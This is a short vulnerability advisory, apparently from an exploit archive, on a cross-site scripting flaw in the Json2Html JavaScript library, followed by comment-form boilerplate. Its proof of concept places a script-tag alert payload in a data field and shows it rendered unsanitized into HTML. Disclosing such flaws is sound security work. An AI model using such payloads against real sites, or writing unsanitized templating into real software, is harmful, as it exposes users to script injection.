Json2Html Cross Site Scripting

2016.06.17

Credit: David Silveiro

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Json2Html Javascript Library - Reflective/Persistant XSS
# Date: 0 day
# Exploit Author: David Silveiro
# Exploit Author Github: github.com/davidsilveiro
# Vendor Homepage: http://json2html.com/
# Software Link: https://github.com/moappi/json2html/archive/master.zip
# Platorm: Javascript


Json2Html is a pure javascript library that transforms json to html and is
used as a Jquery plugin, as well as a Node.js package.

The issue lyes with there being no sanitization when the conversion between
the two occures. For example;

Proof of concept:

var transform = {'<>':'li','html':'${name} (${age})'};
    
var data = [
    {'name':'Bob','age':40},
    {'name':'<script>alert('XSS')</script>','age':34}
];

and then transformed...

<html>

    <li>
        Bob (40)
    </li>

    <li>
        <script>alert('XSS')</script> (34)
    </li>

</html>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Json2Html Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.